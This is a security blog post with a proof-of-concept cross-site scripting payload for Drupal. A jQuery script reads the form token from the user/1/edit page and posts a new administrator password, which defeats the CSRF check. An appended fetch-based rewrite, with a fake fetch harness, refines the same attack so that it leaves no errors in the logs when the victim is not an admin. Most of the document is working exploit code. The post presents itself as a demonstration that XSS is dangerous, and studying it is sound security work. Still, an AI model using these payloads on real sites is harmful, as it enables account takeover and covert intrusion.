Heine


Update UID 1 password via JS

Heine —Mon, 2008/01/14 - 09:08

A simple proof of concept (without <script> tags) that resets the administrator's (UID 1) password via a cross-site scripting (XSS) attack. Because the injected script runs in the victim's session on the same origin, it can first read the form token from the user edit page and then submit the form with it, so Drupal's form token check does not stop it. Did you think XSS was harmless?

// Test for the presence of jQuery.
if (typeof jQuery == 'function') {
  // Fetch a correct token from user/1/edit because we will need it to
  // successfully submit the user edit form later.
  // TODO: Include a check to increase the chance that the current user is admin,
  // which will reduce the number of access denied error messages in the log.
  jQuery.get('/user/1/edit',
    function (data, status) {
      if (status == 'success') {
        // Extract the token. Bail out when the token input is not present
        // (for example, when the response is not the edit form) instead of
        // throwing on a null match.
        var matches = data.match(/id="edit-user-edit-form-token" value="([a-z0-9]*)"/);
        if (!matches) {
          return;
        }
        var token = matches[1];
        // Post the minimum amount of fields. Other fields get their default values.
        var payload = {
          "form_id": 'user_edit',
          "form_token": token,
          "pass[pass1]": 'hacked',
          "pass[pass2]": 'hacked'
        };
        jQuery.post('/user/1/edit', payload);
      }
    }
  );
}
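The same GET-token-then-POST exchange, written as an added example that is not code from the original post, against the fetch API instead of jQuery. The request function is injected so the flow can be exercised offline against a constructed copy of the edit page; the field names (form_id, form_token, pass[pass1], pass[pass2]) and the token input id follow the post, while the sample HTML, the fake fetch and the result shape are assumptions. Unlike the post's snippet it also handles the non-admin case: when the GET fails or the page carries no token, nothing is posted.

```javascript
// Added example, not from the original post. Drupal 6-era field names are
// taken from the post; the sample pages and fake fetch below are constructed.

// Extract the form token from the HTML of user/1/edit. Returns null when the
// page carries no token input, which is what a non-admin sees, so the caller
// can skip the POST rather than send a request that can only fail.
function extractFormToken(html) {
  const m = html.match(/id="edit-user-edit-form-token"\s+value="([a-z0-9]+)"/);
  return m ? m[1] : null;
}

// Build the minimal application/x-www-form-urlencoded body. Fields left out
// keep their defaults on the server side, exactly as in the jQuery version.
function buildPasswordPayload(token, newPassword) {
  const params = new URLSearchParams();
  params.set('form_id', 'user_edit');
  params.set('form_token', token);
  params.set('pass[pass1]', newPassword);
  params.set('pass[pass2]', newPassword);
  return params.toString();
}

// Run the full exchange. fetchImpl is any fetch-compatible function, so the
// flow can be driven by the browser's fetch or by the fake below.
async function resetUid1Password(fetchImpl, newPassword, base = '') {
  const url = base + '/user/1/edit';
  const getRes = await fetchImpl(url, { credentials: 'same-origin' });
  if (!getRes.ok) {
    return { posted: false, reason: 'get-failed', status: getRes.status };
  }
  const token = extractFormToken(await getRes.text());
  if (token === null) {
    return { posted: false, reason: 'no-token' };
  }
  const body = buildPasswordPayload(token, newPassword);
  const postRes = await fetchImpl(url, {
    method: 'POST',
    credentials: 'same-origin',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
    body,
  });
  return { posted: true, status: postRes.status, token, body };
}

// Constructed stand-ins for the server responses (assumed markup, not a real
// Drupal page): an admin's edit form with a token, and pages without one.
const ADMIN_EDIT_PAGE =
  '<form action="/user/1/edit" method="post" id="user-edit">' +
  '<input type="hidden" name="form_token" id="edit-user-edit-form-token" ' +
  'value="0123456789abcdef0123456789abcdef" />' +
  '<input type="hidden" name="form_id" id="edit-user-edit" value="user_edit" />' +
  '</form>';
const ACCESS_DENIED_PAGE = '<h1>Access denied</h1>';
const TOKENLESS_PAGE = '<form id="user-edit"><input name="form_id" value="user_edit" /></form>';

// Fake fetch that serves one page for GET and records every request, so the
// sequence of calls can be inspected without a network.
function makeFakeFetch(getPage, getStatus = 200) {
  const log = [];
  const fetchImpl = async (url, opts = {}) => {
    const method = opts.method || 'GET';
    log.push({ url, method, body: opts.body || null });
    if (method === 'GET') {
      return { ok: getStatus === 200, status: getStatus, text: async () => getPage };
    }
    return { ok: true, status: 302, text: async () => '' };
  };
  return { fetchImpl, log };
}

// Drive the three cases: admin (token found, POST sent), non-admin (403, no
// POST), and a 200 page without a token (no POST).
async function demo() {
  const admin = makeFakeFetch(ADMIN_EDIT_PAGE);
  const adminResult = await resetUid1Password(admin.fetchImpl, 'hacked');
  const denied = makeFakeFetch(ACCESS_DENIED_PAGE, 403);
  const deniedResult = await resetUid1Password(denied.fetchImpl, 'hacked');
  const tokenless = makeFakeFetch(TOKENLESS_PAGE);
  const tokenlessResult = await resetUid1Password(tokenless.fetchImpl, 'hacked');
  return {
    admin: adminResult, adminLog: admin.log,
    denied: deniedResult, deniedLog: denied.log,
    tokenless: tokenlessResult, tokenlessLog: tokenless.log,
  };
}

demo().then((r) => console.log(JSON.stringify(r, null, 2)));
```

In a browser the same resetUid1Password(fetch, 'hacked') call is the whole payload; the two early returns are what the post's TODO asks for, since a non-admin never reaches the POST and so never produces a form validation error in the log.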
  • Security



Copyright © 2021 by Heine Deelstra. All rights reserved.
